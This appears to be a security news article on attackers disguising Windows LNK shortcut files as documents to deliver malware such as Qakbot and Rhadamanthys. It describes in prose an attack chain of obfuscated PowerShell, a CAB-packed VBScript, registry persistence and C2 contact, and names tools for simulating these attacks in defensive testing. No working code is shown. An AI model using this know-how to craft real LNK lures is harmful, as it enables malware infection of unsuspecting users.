cyber security

Hackers Weaponizing Windows Shortcut Files for Phishing

LNK files, a shortcut file type in Windows OS, provide easy access to programs, folders, or websites.

Created automatically during shortcut creation or manually by users, LNK files contain the target location and other information useful for threat intelligence. 

It includes details like the machine identifier where the LNK was built, volume labels, and drive serial numbers, while the .lnk extension is hidden by default in Windows, making identification rely on user awareness or command-line queries. 

Attackers exploit LNK files, a shortcut file format, to bypass detection and deliver malware like Qakbot, Rhadamanthys, Remcos, and Amadey, which are disguised as legitimate files (executables or PDFs) and trick users into clicking on them. 

Rhadamathys LNK Phishing Campaign

This compromises the user’s system or network, and by analyzing active LNK phishing campaigns, defenders can learn attacker tactics and use tools like LECmd to extract LNK content to better understand the attack. 

Scan Your Business Email Inbox to Find Advanced Email Threats - Try AI-Powered Free Threat Scan

Threat actors leverage LNK files in phishing campaigns to deploy malware and conduct reconnaissance, and this is done by embedding malicious scripts or commands within the LNK.

Upon user interaction, the LNK triggers these scripts, which can download malware, steal data, or gather system information. 

LNK Recon

Examples include using LNK to download AsyncRAT or Rhadamanthys trojan, obfuscating PowerShell scripts using techniques like caret symbols, and crafting LNKs to resemble legitimate files like PDFs, which increases the success rate of tricking users into clicking the malicious LNK.  

A malicious LNK file leverages LOLBIN for files to initiate a PowerShell script that executes obfuscated commands, which decrypt encoded data within the LNK and create a decoy DOCX file alongside a malicious CAB archive. 

LNK Obfuscated Powershell

The PowerShell script then utilizes expand.exe to extract the CAB file, which contains a VBScript, batch files, and a legitimate unzip.exe utility. 

VBScript leverages a COM object to execute a batch file that establishes persistence via registry modification and executes additional batch files, which download malicious payloads, steal system information, and communicate with C2 servers.  

LNK Attack Chain

The research by Splunk describes three methods for simulating LNK phishing campaigns to test organizational defenses. The first method utilizes Atomic Red Team’s Invoke-AtomicTest to write an LNK to the startup folder that triggers a command prompt upon user login. 

The second method uses LNK Generator, which simplifies creating desktop shortcuts with various functionalities.

Examples include generating a CMD shortcut or a PowerShell script shortcut that downloads and executes an MSI package. 

The third method leverages Atomic Red Team tests to simulate a malicious LNK file embedded with a CAB file, and by examining real-world malicious LNK files, security analysts can gain insights to develop and test detection capabilities.

Free Webinar! 3 Security Trends to Maximize MSP Growth -> Register For Free

Aman Mishra

Recent Posts

Hackers Claiming Dettol Data Breach: 453,646 users Impacted

A significant data breach has been reported by a threat actor known as 'Hana,' who claims to have compromised the…

2 days ago

CrowdStrike Update Triggers Widespread Windows BSOD Crashes

A recent update from cybersecurity firm CrowdStrike has caused significant disruptions for Windows users, leading to widespread reports of Blue…

2 days ago

Operation Spincaster Disrupts Approval Phishing Technique that Drains Victim’s Wallets

Chainalysis has launched Operation Spincaster, an initiative to disrupt approval phishing scams that have drained billions from victims' wallets. This…

2 days ago

Octo Tempest Know for Attacking VMWare ESXi Servers Added RansomHub & Qilin to Its Arsenal

Threat actors often attack VMware ESXi servers since they accommodate many virtual machines, which link to a variety of systems…

3 days ago

TAG-100 Actors Using Open-Source Tools To Attack Gov & Private Orgs

Hackers exploit open-source tools to execute attacks because they are readily available, well-documented, and often have extensive community support, making…

3 days ago

macOS Users Beware Of Weaponized Meeting App From North Korean Hackers

Meeting apps are often targeted and turned into weapons by hackers as they are largely employed for communication and collaboration,…

3 days ago